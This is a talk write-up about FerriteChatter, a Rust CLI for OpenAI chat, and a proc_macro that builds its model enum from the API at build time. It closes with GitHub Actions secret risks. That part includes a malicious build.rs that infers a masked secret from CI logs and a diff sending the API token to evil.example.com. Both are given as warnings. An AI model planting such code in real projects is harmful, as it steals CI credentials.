A rust-proof implementation with proc_macro, and secrets in GitHub Actions

Rust.Tokyo 2024 sponsor session

This article is a lightly edited write-up of the talk.

Staying rust-free with proc_macro

An implementation using proc_macro designed not to rust.

2024-11-30 Rust.Tokyo

agenda

- FerriteChatter

- proc_macro

- risk

about

FerriteChatter

A tool for chatting with GPT from the terminal or from inside Vim.

Interactive use

$ fchat

> Hello from Rust

Assistant: Hello! How can I assist you with Rust today? Are you looking for

help with a specific project or concept?

> what is Rust.Tokyo?

Assistant: Rust.Tokyo is a conference focused on the Rust programming language,

held in Tokyo, Japan. It's an event where developers, enthusiasts, and

professionals gather to share knowledge, discuss advancements, and explore the

future of Rust. The conference typically features a variety of talks,

workshops, and networking opportunities aimed at fostering the Rust community

in Tokyo and beyond. If you're interested in Rust and have the chance to

attend, it's a great opportunity to learn and connect with other like-minded

individuals.

> in Japanese please

Assistant:

Rust.Tokyoは、日本の東京で開催されるRustプログラミング言語に特化したカンファレンスです。

このイベントでは、開発者や愛好家、専門家が集まり、

知識を共有し、技術の進展を討論し、Rustの未来を探求します。

通常、さまざまな講演やワークショップ、ネットワーキングの機会が提供され、

東京およびそれ以外の地域でRustコミュニティを育成することを目的としています。

Rustに興味があり参加する機会があれば、学びと交流のための素晴らしい機会となるでしょう。

Long input can also be composed in Vim.

One-shot questions

$ fask 'What is the mascot character of the Rust programming language?'

The mascot of the Rust programming language is Ferris the crab. Ferris is an

anthropomorphized crab character, and its name is a play on the word "ferric,"

which relates to iron and reflects Rust's focus on safety and systems

programming. The mascot is well-liked in the Rust community and is often used

in artwork and promotional materials related to Rust.

Translation

$ ftrans 'hello'

こんにちは

It can also be used from inside Vim.

OpenAI API

FerriteChatter uses the openai crate to call the OpenAI API.

Chat Completion API

The message type that a conversation is built on is defined like this:

pub struct ChatCompletionMessage {

pub role: ChatCompletionMessageRole,

pub content: Option<String>,

pub name: Option<String>,

pub function_call: Option<ChatCompletionFunctionCall>,

}

The messages are sent as a Vec:

let mut messages = vec![ChatCompletionMessage {

role: ChatCompletionMessageRole::User,

content: Some("Hello from Rust".to_string()),

name: None,

function_call: None,

}];

let chat_completion = ChatCompletion::builder(model, messages.clone())

.create()

.await?;

let answer = &chat_completion

.choices

.first()

.with_context(|| "Can't read ChatGPT output")?

.message;

// Hello! How’s it going in Rust? What’s on your mind?

The essential part is just this:

let model = "gpt-4o";

let chat_completion = ChatCompletion::builder(model, messages.clone())

.create()

.await?;

simple

select a model and send messages

Model

clap is used through its derive API.

The model to chat with can be chosen with a command-line argument.

#[derive(Parser, Debug)]

#[clap(author, version, about, long_about = None)]

struct Args {

/// Open Prompt(General Prompt)

#[clap(long = "general", short = 'g')]

general: Option<String>,

/// OpenAI API Key

#[clap(long = "key", short = 'k')]

key: Option<String>,

/// OpenAI Model

#[clap(long = "model", short = 'm', value_enum)]

model: Option<Model>,

/// Initial context file

#[clap(long = "file", short = 'f')]

file: Option<String>,

}

I want an enum that contains only the selectable models.

#[derive(Debug, Eq, PartialEq, ValueEnum, Clone)]

#[allow(non_camel_case_types)]

pub enum Model {

#[clap(name = "gpt-4")]

Gpt_4,

#[clap(name = "gpt-4o")]

Gpt_4o,

#[clap(name = "gpt-4o-mini")]

Gpt_4o_mini,

#[clap(name = "gpt-4-0314")]

Gpt_4_0314,

#[clap(name = "gpt-4-0613")]

Gpt_4_0613,

#[clap(name = "gpt-4-32k")]

Gpt_4_32k,

#[clap(name = "gpt-4-32k-0613")]

Gpt_4_32k_0314,

#[clap(name = "gpt-4-1106-preview")]

Gpt_4_1106_Preview,

#[clap(name = "gpt-3.5-turbo")]

Gpt_3_5_Turbo,

#[clap(name = "gpt-3.5-turbo-16k")]

Gpt_3_5_Turbo_16k,

#[clap(name = "gpt-3.5-turbo-0301")]

Gpt_3_5_Turbo_0301,

#[clap(name = "gpt-3.5-turbo-0613")]

Gpt_3_5_Turbo_0613,

#[clap(name = "gpt-3.5-turbo-1106")]

Gpt_3_5_Turbo_1106,

#[clap(name = "gpt-3.5-turbo-16k-0613")]

Gpt_3_5_Turbo_16k_0613,

and more...
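Each model name in this enum is written by hand, and the same names have to be repeated wherever strings are converted to and from variants. As a minimal sketch of how such copies can be kept honest, the following uses a cut-down, hypothetical three-variant `Model` (the `String` error type and the `ALL` array are assumptions for this example, not part of FerriteChatter) and checks that every variant's string maps back to the same variant.

```rust
use std::convert::TryFrom;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[allow(non_camel_case_types)]
enum Model {
    Gpt_4,
    Gpt_4o,
    Gpt_4o_mini,
}

impl Model {
    /// Every variant, listed once so the check below can iterate over them.
    const ALL: [Model; 3] = [Model::Gpt_4, Model::Gpt_4o, Model::Gpt_4o_mini];

    fn as_str(&self) -> &'static str {
        match self {
            Model::Gpt_4 => "gpt-4",
            Model::Gpt_4o => "gpt-4o",
            Model::Gpt_4o_mini => "gpt-4o-mini",
        }
    }
}

impl TryFrom<&str> for Model {
    type Error = String;

    fn try_from(value: &str) -> Result<Self, Self::Error> {
        match value {
            "gpt-4" => Ok(Model::Gpt_4),
            "gpt-4o" => Ok(Model::Gpt_4o),
            "gpt-4o-mini" => Ok(Model::Gpt_4o_mini),
            _ => Err(format!("Unknown model: {value}")),
        }
    }
}

/// Returns the variants whose string form does not map back to the same variant.
fn round_trip_failures() -> Vec<Model> {
    Model::ALL
        .iter()
        .copied()
        .filter(|m| Model::try_from(m.as_str()) != Ok(*m))
        .collect()
}

fn main() {
    println!("round-trip failures: {:?}", round_trip_failures());
}
```

A check like this catches a name pasted onto the wrong variant, but it still has to be extended by hand whenever a model is added.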

However,

the models available through the OpenAI API

are updated frequently.

Every time, that means another tedious update…

diff --git a/src/core.rs b/src/core.rs

index 952c951..46d81c6 100644

--- a/src/core.rs

+++ b/src/core.rs

@@ -8,12 +8,20 @@ use std::fmt;

#[derive(Debug, Eq, PartialEq, ValueEnum, Clone)]

#[allow(non_camel_case_types)]

pub enum Model {

+ #[clap(name = "chatgpt-4o-latest")]

+ ChatGPT_4o_latest,

#[clap(name = "gpt-4")]

Gpt_4,

#[clap(name = "gpt-4o")]

Gpt_4o,

+ #[clap(name = "gpt-4o-2024-05-13")]

+ Gpt_4o_2024_05_13,

+ #[clap(name = "gpt-4o-2024-08-06")]

+ Gpt_4o_2024_08_06,

#[clap(name = "gpt-4o-mini")]

Gpt_4o_mini,

+ #[clap(name = "gpt-4o-mini-2024-07-18")]

+ Gpt_4o_mini_2024_07_18,

#[clap(name = "gpt-4-0314")]

Gpt_4_0314,

#[clap(name = "gpt-4-0613")]

@@ -22,18 +30,28 @@ pub enum Model {

Gpt_4_32k,

#[clap(name = "gpt-4-32k-0613")]

Gpt_4_32k_0314,

+ #[clap(name = "gpt-4-0125-preview")]

+ Gpt_4_0125_Preview,

#[clap(name = "gpt-4-1106-preview")]

Gpt_4_1106_Preview,

+ #[clap(name = "gpt-4-turbo")]

+ Gpt_4_Turbo,

+ #[clap(name = "gpt-4-turbo-2024-04-09")]

+ Gpt_4_Turbo_2024_04_09,

+ #[clap(name = "gpt-4-turbo-preview")]

+ Gpt_4_Turbo_Preview,

#[clap(name = "gpt-3.5-turbo")]

Gpt_3_5_Turbo,

- #[clap(name = "gpt-3.5-turbo-16k")]

- Gpt_3_5_Turbo_16k,

+ #[clap(name = "gpt-3.5-turbo-0125")]

+ Gpt_3_5_Turbo_0125,

#[clap(name = "gpt-3.5-turbo-0301")]

Gpt_3_5_Turbo_0301,

#[clap(name = "gpt-3.5-turbo-0613")]

Gpt_3_5_Turbo_0613,

#[clap(name = "gpt-3.5-turbo-0613")]

Gpt_3_5_Turbo_1106,

+ #[clap(name = "gpt-3.5-turbo-16k")]

+ Gpt_3_5_Turbo_16k,

#[clap(name = "gpt-3.5-turbo-16k-0613")]

Gpt_3_5_Turbo_16k_0613,

}

@@ -42,48 +60,68 @@ pub const DEFAULT_MODEL: Model = Model::Gpt_4o;

impl TryFrom<&str> for Model {

type Error = anyhow::Error;

- fn try_from(value: &str) -> Result<Model> {

+ fn try_from(value: &str) -> Result<Model, Self::Error> {

match value {

+ "chatgpt-4o-latest" => Ok(Model::ChatGPT_4o_latest),

"gpt-4" => Ok(Model::Gpt_4),

"gpt-4o" => Ok(Model::Gpt_4o),

+ "gpt-4o-2024-05-13" => Ok(Model::Gpt_4o_2024_05_13),

+ "gpt-4o-2024-08-06" => Ok(Model::Gpt_4o_2024_08_06),

"gpt-4o-mini" => Ok(Model::Gpt_4o_mini),

+ "gpt-4o-mini-2024-07-18" => Ok(Model::Gpt_4o_mini_2024_07_18),

"gpt-4-0314" => Ok(Model::Gpt_4_0314),

"gpt-4-0613" => Ok(Model::Gpt_4_0613),

"gpt-4-32k" => Ok(Model::Gpt_4_32k),

You can, of course, have the AI generate it.

$ fchat -f src/core.rs

> Below is the list of available models fetched from https://api.openai.com/v1/models. Pick the ones that can be used with ChatCompletion and update the Model implementation to match // (in vim with JSON)

Assistant: Based on your list, I will identify the models that are likely available for ChatCompletion usage and rewrite the `Model` implementation accordingly. Here are the models that suit this purpose:

1. `gpt-4`

2. `gpt-3.5-turbo`

3. `gpt-3.5-turbo-16k`

4. `gpt-3.5-turbo-0613`

5. `gpt-3.5-turbo-1106`

6. `gpt-4-turbo`

7. `gpt-4-turbo-2024-04-09`

8. `gpt-4-1106-preview`

9. `gpt-4-0613`

Now, we should update the Rust `Model` enum and its respective implementations. Here's the revised code:

```rust

use anyhow::{anyhow, Result};

use clap::ValueEnum;

use serde::de::{self, Deserializer, Visitor};

use serde::Deserialize;

use std::convert::TryFrom;

use std::fmt;

#[derive(Debug, Eq, PartialEq, ValueEnum, Clone)]

#[allow(non_camel_case_types)]

pub enum Model {

#[clap(name = "gpt-4")]

Gpt_4,

#[clap(name = "gpt-3.5-turbo")]

Gpt_3_5_Turbo,

#[clap(name = "gpt-3.5-turbo-16k")]

Gpt_3_5_Turbo_16k,

#[clap(name = "gpt-3.5-turbo-0613")]

Gpt_3_5_Turbo_0613,

#[clap(name = "gpt-3.5-turbo-1106")]

Gpt_3_5_Turbo_1106,

#[clap(name = "gpt-4-turbo")]

Gpt_4_Turbo,

#[clap(name = "gpt-4-turbo-2024-04-09")]

Gpt_4_Turbo_2024_04_09,

#[clap(name = "gpt-4-1106-preview")]

Gpt_4_1106_Preview,

#[clap(name = "gpt-4-0613")]

Gpt_4_0613,

}

pub const DEFAULT_MODEL: Model = Model::Gpt_4;

impl TryFrom<&str> for Model {

type Error = anyhow::Error;

fn try_from(value: &str) -> Result<Model> {

match value {

"gpt-4" => Ok(Model::Gpt_4),

"gpt-3.5-turbo" => Ok(Model::Gpt_3_5_Turbo),

"gpt-3.5-turbo-16k" => Ok(Model::Gpt_3_5_Turbo_16k),

"gpt-3.5-turbo-0613" => Ok(Model::Gpt_3_5_Turbo_0613),

"gpt-3.5-turbo-1106" => Ok(Model::Gpt_3_5_Turbo_1106),

"gpt-4-turbo" => Ok(Model::Gpt_4_Turbo),

"gpt-4-turbo-2024-04-09" => Ok(Model::Gpt_4_Turbo_2024_04_09),

"gpt-4-1106-preview" => Ok(Model::Gpt_4_1106_Preview),

"gpt-4-0613" => Ok(Model::Gpt_4_0613),

_ => Err(anyhow!("Unknown model: {}", value)),

}

}

}

impl Model {

pub fn as_str(&self) -> &'static str {

match self {

Self::Gpt_4 => "gpt-4",

Self::Gpt_3_5_Turbo => "gpt-3.5-turbo",

Self::Gpt_3_5_Turbo_16k => "gpt-3.5-turbo-16k",

Self::Gpt_3_5_Turbo_0613 => "gpt-3.5-turbo-0613",

Self::Gpt_3_5_Turbo_1106 => "gpt-3.5-turbo-1106",

Self::Gpt_4_Turbo => "gpt-4-turbo",

Self::Gpt_4_Turbo_2024_04_09 => "gpt-4-turbo-2024-04-09",

Self::Gpt_4_1106_Preview => "gpt-4-1106-preview",

Self::Gpt_4_0613 => "gpt-4-0613",

}

}

}

impl<'de> Deserialize<'de> for Model {

fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>

where

D: Deserializer<'de>,

{

struct ModelVisitor;

impl<'de> Visitor<'de> for ModelVisitor {

type Value = Model;

fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result {

formatter.write_str("a string representing a model")

}

fn visit_str<E>(self, value: &str) -> Result<Model, E>

where

E: de::Error,

{

Model::try_from(value).map_err(|e| de::Error::custom(e.to_string()))

}

}

deserializer.deserialize_str(ModelVisitor)

}

}

```

But the effort involved is about the same.

generate with proc_macro

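Updating the implementation every time,

then bumping the version and publishing, is tedious.

Some models in the API are also available only to certain users.

Result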

use anyhow::{anyhow, Result};

use clap::ValueEnum;

use ferrite_model_gen::generate_models;

use serde::de::{self, Deserializer, Visitor};

use serde::Deserialize;

use std::convert::TryFrom;

use std::fmt;

generate_models!();

pub const DEFAULT_MODEL: Model = Model::Gpt_4o;

ferrite_model_gen

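The endpoint that lists the available models:

https://api.openai.com/v1/models

From the response JSON,

extract the ID strings of the models that can be used with ChatCompletion.

For now, that means IDs containing "gpt" or "o1".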

let api_url = "https://api.openai.com/v1/models";

let api_key = env::var("OPENAI_API_KEY")

.expect("OPENAI_API_KEY must be set");

let client = Client::new();

let res = client

.get(api_url)

.header("Authorization", format!("Bearer {}", api_key))

.send()

.expect("Failed to send request");

let models: Vec<Model> = res

.json::<serde_json::Value>()

.expect("Failed to parse response")

.get("data")

.expect("Missing 'data' field in response")

.as_array()

.expect("'data' is not an array")

.iter()

.map(|model| serde_json::from_value(model.clone())

.expect("Failed to deserialize model"))

.filter(|m: &Model| m.id.contains("gpt") || m.id.contains("o1"))

.collect();
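To see the filtering step in isolation, here is a std-only sketch that applies the same substring test to a plain list of IDs. The function name `chat_model_ids` and the sample IDs are assumptions made for this example; the real macro works on the deserialized `data` array.

```rust
/// Keeps only the IDs that pass the same substring test as the snippet above.
fn chat_model_ids<'a>(ids: &[&'a str]) -> Vec<&'a str> {
    ids.iter()
        .copied()
        .filter(|id| id.contains("gpt") || id.contains("o1"))
        .collect()
}

fn main() {
    // Hypothetical sample of IDs as they might appear in the `data` array.
    let ids = ["gpt-4o", "whisper-1", "o1-mini", "text-embedding-3-small", "dall-e-3"];
    println!("{:?}", chat_model_ids(&ids));
}
```

The test is deliberately loose: any ID that merely contains one of the two substrings passes, so the result is only as precise as the naming of the models.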

The enum variants

let enum_variants: Vec<_> = models

.iter()

.map(|m| {

let variant_name = to_camel_case(&m.id);

let variant_str = &m.id;

quote! {

#[clap(name = #variant_str)]

#variant_name,

}

})

.collect();

match arm

let match_arms: Vec<_> = models

.iter()

.map(|m| {

let variant_name = to_camel_case(&m.id);

let variant_str = &m.id;

quote! {

#variant_str => Ok(Model::#variant_name),

}

})

.collect();

The as_str implementation

let as_str_arms: Vec<_> = models

.iter()

.map(|m| {

let variant_name = to_camel_case(&m.id);

let variant_str = &m.id;

quote! {

Model::#variant_name => #variant_str,

}

})

.collect();

Generating the code with quote

let expanded = quote! {

#[derive(Debug, Eq, PartialEq, ValueEnum, Clone)]

#[allow(non_camel_case_types)]

pub enum Model {

#(#enum_variants)*

}

impl TryFrom<&str> for Model {

type Error = anyhow::Error;

fn try_from(value: &str) -> Result<Model, Self::Error> {

match value {

#(#match_arms)*

_ => Err(anyhow!("Unknown Model. If a model does not exist to support it, please create an issue at github.com/n01e0/FerriteChatter/issues/new.")),

}

}

}

impl Model {

pub fn as_str(&self) -> &'static str {

match self {

#(#as_str_arms)*

}

}

}

impl<'de> Deserialize<'de> for Model {

fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>

where

D: Deserializer<'de>,

{

struct ModelVisitor;

impl<'de> Visitor<'de> for ModelVisitor {

type Value = Model;

fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result {

formatter.write_str("a string representing a model")

}

fn visit_str<E>(self, value: &str) -> Result<Model, E>

where

E: de::Error,

{

Model::try_from(value).map_err(|e| de::Error::custom(e.to_string()))

}

}

deserializer.deserialize_str(ModelVisitor)

}

}

};

TokenStream::from(expanded)
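To make the repetition `#(#enum_variants)*` more concrete, the following std-only sketch renders, as plain text, roughly what the expansion looks like for a given list of models. It builds a `String` rather than a `TokenStream`, covers only the enum and `as_str`, and the function name `render_expansion` is an assumption made for this example.

```rust
/// Renders, as plain text, roughly what the macro expands to for the given
/// (variant name, model ID) pairs. Only the enum and `as_str` are shown.
fn render_expansion(models: &[(&str, &str)]) -> String {
    let mut out = String::from("pub enum Model {\n");
    for (variant, id) in models {
        // One attribute plus one variant per model, like `enum_variants`.
        out.push_str(&format!("    #[clap(name = \"{id}\")]\n    {variant},\n"));
    }
    out.push_str("}\n\nimpl Model {\n    pub fn as_str(&self) -> &'static str {\n        match self {\n");
    for (variant, id) in models {
        // One match arm per model, like `as_str_arms`.
        out.push_str(&format!("            Model::{variant} => \"{id}\",\n"));
    }
    out.push_str("        }\n    }\n}\n");
    out
}

fn main() {
    let models = [("Gpt_4o", "gpt-4o"), ("O1_Mini", "o1-mini")];
    print!("{}", render_expansion(&models));
}
```

The real macro produces tokens, not text, so quoting and identifier validity are handled by `quote` and `syn` instead of by string formatting.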

The whole thing

extern crate proc_macro;

use proc_macro::TokenStream;

use quote::quote;

use reqwest::blocking::Client;

use serde::Deserialize;

use std::env;

use anyhow::Context;

#[derive(Deserialize)]

struct Model {

id: String,

}

#[proc_macro]

pub fn generate_models(_input: TokenStream) -> TokenStream {

// OpenAI API endpoint

let api_url = "https://api.openai.com/v1/models";

// Read the OpenAI API key from the environment

let api_key = env::var("OPENAI_API_KEY").expect("OPENAI_API_KEY must be set");

// Create an HTTP client, call the API, and fetch the list of models

let client = Client::new();

let res = client

.get(api_url)

.header("Authorization", format!("Bearer {}", api_key))

.send()

.expect("Failed to send request");

let models: Vec<Model> = res

.json::<serde_json::Value>()

.expect("Failed to parse response")

.get("data")

.expect("Missing 'data' field in response")

.as_array()

.expect("'data' is not an array")

.iter()

.map(|model| serde_json::from_value(model.clone()).expect("Failed to deserialize model"))

.filter(|m: &Model| m.id.contains("gpt") || m.id.contains("o1"))

.collect();

// Generate the enum variants and impl arms for each model

let enum_variants: Vec<_> = models

.iter()

.map(|m| {

let variant_name = to_camel_case(&m.id);

let variant_str = &m.id;

quote! {

#[clap(name = #variant_str)]

#variant_name,

}

})

.collect();

let match_arms: Vec<_> = models

.iter()

.map(|m| {

let variant_name = to_camel_case(&m.id);

let variant_str = &m.id;

quote! {

#variant_str => Ok(Model::#variant_name),

}

})

.collect();

let as_str_arms: Vec<_> = models

.iter()

.map(|m| {

let variant_name = to_camel_case(&m.id);

let variant_str = &m.id;

quote! {

Model::#variant_name => #variant_str,

}

})

.collect();

let expanded = quote! {

#[derive(Debug, Eq, PartialEq, ValueEnum, Clone)]

#[allow(non_camel_case_types)]

pub enum Model {

#(#enum_variants)*

}

impl TryFrom<&str> for Model {

type Error = anyhow::Error;

fn try_from(value: &str) -> Result<Model, Self::Error> {

match value {

#(#match_arms)*

_ => Err(anyhow!("Unknown Model. If a model does not exist to support it, please create an issue at github.com/n01e0/FerriteChatter/issues/new.")),

}

}

}

impl Model {

pub fn as_str(&self) -> &'static str {

match self {

#(#as_str_arms)*

}

}

}

impl<'de> Deserialize<'de> for Model {

fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>

where

D: Deserializer<'de>,

{

struct ModelVisitor;

impl<'de> Visitor<'de> for ModelVisitor {

type Value = Model;

fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result {

formatter.write_str("a string representing a model")

}

fn visit_str<E>(self, value: &str) -> Result<Model, E>

where

E: de::Error,

{

Model::try_from(value).map_err(|e| de::Error::custom(e.to_string()))

}

}

deserializer.deserialize_str(ModelVisitor)

}

}

};

TokenStream::from(expanded)

}

// Helper function to turn a model ID such as "gpt-4o" into an enum variant identifier

fn to_camel_case(s: &str) -> syn::Ident {

// Replace '.' with '_', split on '-', capitalize each part, and join the parts with '_'

let replaced: String = s.chars()

.map(|c| {

if c == '.' {

'_'

} else {

c

}

})

.collect();

let camel_case = replaced

.split('-')

.map(|word| capitalize(word))

.collect::<Vec<String>>()

.join("_");

syn::parse_str(&camel_case).with_context(|| format!("While parsing {}", s)).unwrap()

}

// Helper function to capitalize the first letter of a word

fn capitalize(word: &str) -> String {

let mut chars = word.chars();

match chars.next() {

None => String::new(),

Some(f) => f.to_uppercase().collect::<String>() + chars.as_str(),

}

}
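The naming step is easy to try without a proc-macro crate. The sketch below repeats the same string steps as `to_camel_case` but returns a `String` instead of a `syn::Ident`. The names `variant_name` and `looks_like_ident` are assumptions for this example, and the identifier check is only a rough ASCII approximation of what `syn::parse_str` accepts.

```rust
/// Std-only stand-in for `to_camel_case`: same string steps, but returns a
/// `String` instead of a `syn::Ident`.
fn variant_name(id: &str) -> String {
    id.replace('.', "_")
        .split('-')
        .map(capitalize)
        .collect::<Vec<String>>()
        .join("_")
}

/// Upper-cases the first character of a word and keeps the rest unchanged.
fn capitalize(word: &str) -> String {
    let mut chars = word.chars();
    match chars.next() {
        None => String::new(),
        Some(first) => first.to_uppercase().collect::<String>() + chars.as_str(),
    }
}

/// Rough check for the ASCII identifiers these IDs produce: a leading letter
/// or underscore, then letters, digits, or underscores.
fn looks_like_ident(name: &str) -> bool {
    let mut chars = name.chars();
    match chars.next() {
        Some(c) if c.is_ascii_alphabetic() || c == '_' => {
            chars.all(|c| c.is_ascii_alphanumeric() || c == '_')
        }
        _ => false,
    }
}

fn main() {
    // "4o-mini" is a made-up ID, included to show a name that is not an identifier.
    for id in ["gpt-4o", "gpt-3.5-turbo", "o1-mini", "4o-mini"] {
        let name = variant_name(id);
        println!("{id} -> {name} (identifier: {})", looks_like_ident(&name));
    }
}
```

With these steps "gpt-4o" becomes `Gpt_4o`, which is the variant that `DEFAULT_MODEL` refers to. An ID that starts with a digit would not yield an identifier, and in the macro that case ends in the `unwrap()` panic at build time.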

The implementation can now be generated at build time

from the models that are actually available.

OpenAI added a new model!

before

- Call the API to confirm the model is usable

- Add it to the enum

- Bump the version

- Push and publish

after

cargo install -f FerriteChatter

Risk

Calling the API at build time

made the implementation simpler and removed the update chore.

But as it stands, CI doesn't work…





So, reluctantly, I set the API token as a repository secret.

Is that really OK…?



Secrets in GitHub Actions logs

secret: ***

Secrets that would appear in the log output are masked.

What does that look like?

$ cargo new secret_leakage_test

use std::env;

fn main() -> Result<(), Box<dyn std::error::Error>> {

let secret = env::var("SECRET")?;

println!("secret: {}", secret);

Ok(())

}





It looks like something about as simple as s/secret/***/g…

Checking ***_leakage_test v0.1.0 (/home/runner/work/***_leakage_test/***_leakage_test)

Don't use values that are easy to guess or that are also used elsewhere.
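The behaviour seen in that log line can be modelled with a plain substring replacement. This is only a sketch of the observed effect, assuming the secret's value was the string "secret"; it is not GitHub's actual implementation, and the function name `mask` is made up for this example.

```rust
/// Naive stand-in for the log masker: every occurrence of the secret's value
/// becomes "***". An empty secret is left alone so the log isn't mangled.
fn mask(log: &str, secret: &str) -> String {
    if secret.is_empty() {
        return log.to_string();
    }
    log.replace(secret, "***")
}

fn main() {
    let line = "Checking secret_leakage_test v0.1.0";
    println!("{}", mask(line, "secret"));
}
```

Because the replacement does not care where the value appears, a short or common value ends up masked in unrelated text, which is itself a hint about what the value is.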

OK?



What if a PR arrives?

🤔



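First, I just want to see the CI result.

Looks fine.

Secrets are not passed to CI runs triggered by PRs from forks.

But once the PR is merged…

CI runs with the secret available.

(The same happens when the owner pushes a commit to the PR.)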



A malicious build.rs

fn main() {

if let Ok(secret) = std::env::var("SECRET") {

if secret.len() > 1 {

let mut output = String::new();

for c in (32..=126).map(|c| c as u8 as char) {

output.push(c);

output.push_str(&secret[1..]);

output.push(' ');

}

println!("cargo::warning={}", output);

}

}

}



Because the matching candidate is replaced with ***, the secret can be inferred.
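The inference can be reproduced end to end with a small simulation. This is a sketch under stated assumptions: `mask` is a naive substring replacement standing in for the log masking, the secret is ASCII and at least two characters long, and the candidates are written one per line instead of space-separated so they are easy to parse. The names `probe` and `recover` are made up for this example.

```rust
/// Naive stand-in for the log masking: replaces the secret with "***".
fn mask(log: &str, secret: &str) -> String {
    log.replace(secret, "***")
}

/// What the build script emits, one candidate per line here: each printable
/// ASCII character followed by the secret minus its first byte.
/// Assumes an ASCII secret of at least two characters.
fn probe(secret: &str) -> String {
    let tail = &secret[1..];
    (32u8..=126)
        .map(|c| format!("{}{}", c as char, tail))
        .collect::<Vec<_>>()
        .join("\n")
}

/// The attacker's view: the position of the masked line gives the first
/// character, and any unmasked line gives the rest.
fn recover(masked_log: &str) -> Option<String> {
    let pos = masked_log.lines().position(|line| line == "***")?;
    let first = (32u8 + pos as u8) as char;
    let tail = masked_log.lines().find(|line| *line != "***")?.get(1..)?;
    Some(format!("{first}{tail}"))
}

fn main() {
    let secret = "hunter2"; // hypothetical secret value
    let masked = mask(&probe(secret), secret);
    println!("{:?}", recover(&masked));
}
```

Only the candidate that equals the full secret is masked, so the masking itself marks the correct first character while the remaining lines print the rest in the clear.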

Showing up in the log is still the mild case.

Suppose a change like this came in…

diff --git a/ferrite_model_gen/src/lib.rs b/ferrite_model_gen/src/lib.rs

index bc7bdc6..28ed971 100644

--- a/ferrite_model_gen/src/lib.rs

+++ b/ferrite_model_gen/src/lib.rs

@@ -14,7 +14,7 @@ struct Model {

#[proc_macro]

pub fn generate_models(_input: TokenStream) -> TokenStream {

// OpenAI API endpoint

- let api_url = "https://api.openai.com/v1/models";

+ let api_url = "https://evil.example.com";

The token is sent, in the Authorization header, to an endpoint the attacker controls.

If you have repository secrets that are tied to money, be wary of PRs as well.



What about Dependabot?

As noted, secrets are not passed to CI runs for PRs from forks.

The same applies to PRs created by Dependabot.

Set up Dependabot secrets for those.

👿

A library you depend on could also be changed for the worse and steal the token…

On the service side, set per-token budgets and monitoring…

fin

github.com/n01e0/FerriteChatter

OPENAI_API_KEY=*** cargo install FerriteChatter

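Closing

This article is the day 1 entry of the 🎅 GMO Pepabo Engineers Advent Calendar 2024. Tomorrow's entry is 「Honoのサンプルコードの内側を覗く」 ("Peeking inside Hono's sample code") by yoshikouki.

It is also the day 1 entry of the n01e0 Advent Calendar 2024. Whether there will be a day 2, I don't know.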
